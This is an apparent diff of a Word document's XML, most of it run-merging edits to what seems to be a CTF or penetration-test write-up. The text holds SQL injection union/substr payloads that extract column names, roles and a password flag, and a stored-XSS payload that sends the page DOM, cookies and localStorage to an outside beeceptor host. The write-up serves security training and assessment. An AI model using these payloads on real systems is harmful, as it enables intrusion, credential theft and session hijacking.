-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(column_name,1,2)=BINARY 'id' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>column_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;&gt;'</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>api</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, column_name from information_schema.columns where table_name='Users' having substr(column_name,1,2)=BINARY 'id' and column_name&lt;&gt;'api' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13596,21 +12309,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>"</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>api</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>", "id", "password", "probation", "</w:t>
+              <w:t>"api", "id", "password", "probation", "</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13720,9 +12419,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">' union select NULL,NULL, </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13730,9 +12428,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>roles</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13740,7 +12437,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
+              <w:t xml:space="preserve"> from </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13749,7 +12446,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>roles</w:t>
+              <w:t>Users</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13758,45 +12455,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Users</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
+              <w:t xml:space="preserve"> having substr(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13876,47 +12535,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, roles from Users having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(roles,1,8)=BINARY 'HR admin' and roles&lt;&gt;'user' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, roles from Users having substr(roles,1,8)=BINARY 'HR admin' and roles&lt;&gt;'user' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -14075,10 +12694,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+              <w:t>' union select NULL,roles,username from Users having</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14086,9 +12703,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,roles</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14096,9 +12712,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>,username</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>substr(username,1,</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14106,7 +12721,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> from Users having</w:t>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14115,9 +12730,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>)=BINARY '</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14125,47 +12739,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(username,1,</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>)=BINARY '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
               <w:t>prodigysml</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14244,10 +12819,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">' union select NULL,username,password from Users having substr(password,1,32)=BINARY 'FLAG{Wear_some_glasses_minions!}' and </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14255,97 +12828,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,username</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,password</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from Users having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(password,1,32)=BINARY 'FLAG{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Wear_some_glasses_minions</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">!}' and </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>username=BINARY '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>prodigysml</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>' limit 1 --+</w:t>
+              <w:t>username=BINARY 'prodigysml' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14373,14 +12857,12 @@
               </w:rPr>
               <w:t>eaks out the password of “</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>prodigysml</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
@@ -14397,21 +12879,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>FLAG{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Wear_some_glasses_minions</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>!}</w:t>
+              <w:t>FLAG{Wear_some_glasses_minions!}</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14572,21 +13040,12 @@
         </w:rPr>
         <w:t>`</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>py</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sqli.py</w:t>
+        <w:t>py sqli.py</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14721,7 +13180,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:bookmarkStart w:id="50" w:name="_Section2_–_stored"/>
-      <w:bookmarkStart w:id="51" w:name="_Toc71451234"/>
+      <w:bookmarkStart w:id="51" w:name="_Toc71453348"/>
       <w:bookmarkEnd w:id="50"/>
       <w:r>
         <w:rPr>
@@ -14748,7 +13207,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="52" w:name="_Exploitation_1"/>
-      <w:bookmarkStart w:id="53" w:name="_Toc71451235"/>
+      <w:bookmarkStart w:id="53" w:name="_Toc71453349"/>
       <w:bookmarkEnd w:id="52"/>
       <w:r>
         <w:rPr>
@@ -14799,8 +13258,8 @@
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="846"/>
-        <w:gridCol w:w="5386"/>
-        <w:gridCol w:w="2787"/>
+        <w:gridCol w:w="3969"/>
+        <w:gridCol w:w="4204"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
@@ -14837,7 +13296,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5386" w:type="dxa"/>
+            <w:tcW w:w="3969" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -14863,7 +13322,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2787" w:type="dxa"/>
+            <w:tcW w:w="4204" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -14917,7 +13376,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="5386" w:type="dxa"/>
+            <w:tcW w:w="3969" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -14954,20 +13413,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var serializer = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">  var serializer = new XMLSerializer();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLSerializer</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14975,38 +13432,37 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">  var xhttp = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t xml:space="preserve">  xhttp.open("POST", "https://hermes.free.beeceptor.com");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15014,20 +13470,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhttp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">  xhttp.send(</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15035,19 +13489,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">    "dom=" + serializer.serializeToString(document) +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15055,7 +13508,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>);</w:t>
+              <w:t xml:space="preserve">    "&amp;cookie=" + document.cookie +</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15074,21 +13527,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">    "&amp;localStorage=" + JSON.stringify(localStorage));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhttp.open</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15096,270 +13546,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhttp.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>dom</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>serializer.serializeToString</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(document) +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    "&amp;cookie=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>document.cookie</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
